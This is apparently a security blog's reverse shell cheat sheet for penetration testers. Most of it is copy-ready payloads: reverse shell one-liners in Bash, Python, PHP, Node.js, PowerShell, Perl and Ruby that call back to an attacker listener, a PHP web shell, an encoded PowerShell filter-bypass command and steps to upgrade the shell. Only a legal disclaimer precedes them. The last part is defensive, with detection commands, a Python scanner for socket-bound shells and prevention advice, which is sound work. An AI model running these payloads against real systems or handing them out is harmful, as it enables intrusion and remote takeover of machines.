Reverse Shell Cheat Sheet: Every Payload for Pentesters (2026 Updated)

SCRs Team
March 1, 2026

What Is a Reverse Shell?

A reverse shell makes the target machine connect back to the attacker's machine and hands the attacker an interactive command line. Unlike a bind shell, which opens a listening port on the target, a reverse shell often gets through firewalls because the connection is outbound, and outbound traffic is typically filtered less strictly than inbound.

Attacker (Listener)              Target (Victim)
┌────────────────┐              ┌─────────────────┐
│ nc -lvnp 4444  │◄─────────────│ Reverse Shell   │
│ IP: 10.10.14.5 │  Outbound    │ Payload Runs    │
│ Waits for      │  Connection  │ Connects to     │
│ connection     │              │ attacker:4444   │
└────────────────┘              └─────────────────┘

⚠️ Legal disclaimer: Only use these on systems you own or have explicit written authorization to test. Unauthorized access is a criminal offense.


Setting Up the Listener

# Basic Netcat listener
nc -lvnp 4444

# Netcat with readline (better UX)
rlwrap nc -lvnp 4444

# Socat (upgraded interactive shell)
socat file:`tty`,raw,echo=0 tcp-listen:4444

# Metasploit multi/handler
msfconsole -q -x "use exploit/multi/handler; set payload linux/x64/shell_reverse_tcp; set LHOST 10.10.14.5; set LPORT 4444; run"

Reverse Shell Payloads by Language

Bash

# Standard bash reverse shell
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1

# Alternative with explicit redirection
bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'

# Using /dev/tcp (if bash supports it)
exec 5<>/dev/tcp/10.10.14.5/4444; cat <&5 | while read line; do $line 2>&5 >&5; done

Python

# Python 3 reverse shell
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.5",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'

# Python 2 (legacy systems)
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

PHP

# PHP reverse shell
php -r '$sock=fsockopen("10.10.14.5",4444);exec("bash <&3 >&3 2>&3");'

# PHP command execution via web shell
<?php system($_GET['cmd']); ?>
// Usage: http://target.com/shell.php?cmd=id

Node.js

// Node.js reverse shell
require('child_process').exec('bash -i >& /dev/tcp/10.10.14.5/4444 0>&1')

// Pure Node.js (no bash dependency)
(function(){var net=require("net"),cp=require("child_process"),sh=cp.spawn("bash",[]);var client=new net.Socket();client.connect(4444,"10.10.14.5",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client)});})()

PowerShell (Windows)

# PowerShell reverse shell
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.5",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

# Encoded PowerShell (bypass basic filters)
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0A...

Perl

perl -e 'use Socket;$i="10.10.14.5";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("bash -i");};'

Ruby

ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.5",4444))'

Upgrading to a Fully Interactive Shell

After getting a basic reverse shell, upgrade it:

# Step 1: Spawn a PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Step 2: Background the shell
Ctrl+Z

# Step 3: Fix terminal settings
stty raw -echo; fg

# Step 4: Set terminal type
export TERM=xterm
export SHELL=bash
stty rows 50 cols 200

Defensive Detection

Network Indicators

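# Detect outbound connections from web servers: list established TCP
# connections with their owning process (run as root to see every process)
ss -tnp state established
lsof -i -P -n | grep ESTABLISHED | grep -v sshd

# Look for unusual outbound connections. Ports are anchored so :8080 or :2222
# are not hidden; a callback to port 80 or 443 still passes this filter.
netstat -an | grep ESTABLISHED | grep -Ev ':(22|80|443)[[:space:]]'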

Process Monitoring

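# Detect spawned shells and interpreters (-w matches whole words, so "sh" does
# not match sshd); the PPID column shows whether the parent is a web server
ps -eo pid,ppid,user,args | grep -wE 'bash|sh|python[0-9.]*|perl|ruby|nc|ncat|socat' | grep -v grep

# Check for /dev/tcp in process command lines (bash reverse shells). /dev/tcp is
# a bash redirection, not a real file, so it never appears under /proc/*/fd;
# the open connection shows up there as socket:[inode].
grep -la '/dev/tcp' /proc/[0-9]*/cmdline 2>/dev/null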
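
Most of the payloads above end the same way: the interpreter's stdin and stdout are duplicated onto one TCP socket. The following Python script (an added example, not part of the original article) walks /proc for that pattern and resolves the socket inode to its remote endpoint. The function names, the `proc_root` parameter and the interpreter list are assumptions chosen for illustration, and pipe-based variants such as the pure Node.js payload are not caught.

```python
import os
import re
import socket
import struct

# Interpreter/tool names taken from the payload list on this page (exact comm match).
SUSPECT = re.compile(r"(ba|da|z|k)?sh|python[\d.]*|perl|ruby|php[\d.]*|node|nc|ncat|socat")


def tcp_peers(proc_root="/proc"):
    """Map socket inode -> remote 'ip:port' from <proc_root>/net/tcp (IPv4 only)."""
    peers = {}
    try:
        with open(os.path.join(proc_root, "net", "tcp")) as fh:
            next(fh, None)  # skip the column header
            for line in fh:
                f = line.split()
                if len(f) < 10:
                    continue
                ip_hex, port_hex = f[2].split(":")
                # Address is printed as a native-endian integer; assumes a little-endian host.
                ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
                peers[f[9]] = f"{ip}:{int(port_hex, 16)}"
    except OSError:
        pass  # no table readable: peers are reported as "unknown"
    return peers


def find_socket_shells(proc_root="/proc"):
    """Return suspect processes whose stdin and stdout are the same socket."""
    peers, hits = tcp_peers(proc_root), []
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        base = os.path.join(proc_root, pid)
        try:
            with open(os.path.join(base, "comm")) as fh:
                comm = fh.read().strip()
            fd0 = os.readlink(os.path.join(base, "fd", "0"))
            fd1 = os.readlink(os.path.join(base, "fd", "1"))
        except OSError:
            continue  # process exited, or its fd table is not readable without root
        m = re.fullmatch(r"socket:\[(\d+)\]", fd0)
        if m and fd0 == fd1 and SUSPECT.fullmatch(comm):
            hits.append({"pid": int(pid), "comm": comm, "inode": m.group(1),
                         "peer": peers.get(m.group(1), "unknown")})
    return sorted(hits, key=lambda h: h["pid"])


if __name__ == "__main__":
    for hit in find_socket_shells():
        print("{pid}\t{comm}\tsocket:[{inode}]\tpeer={peer}".format(**hit))
```

Run it as root so every process's fd table is readable. Requiring fd 0 and fd 1 to be the same socket keeps out SSH sessions (pty) and FastCGI workers (listening socket on fd 0 only).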

Prevention

  1. Egress filtering — Block outbound connections from web servers except to known services
  2. Application allowlisting — Only approved binaries can execute
  3. Disable unnecessary interpreters — Remove Python, Perl, Ruby from production web servers
  4. Monitor /dev/tcp — Alert on bash processes accessing /dev/tcp
  5. Container isolation — Run applications in containers with minimal tools
  6. WAF rules — Block payloads containing reverse shell patterns

Published by SecureCodeReviews
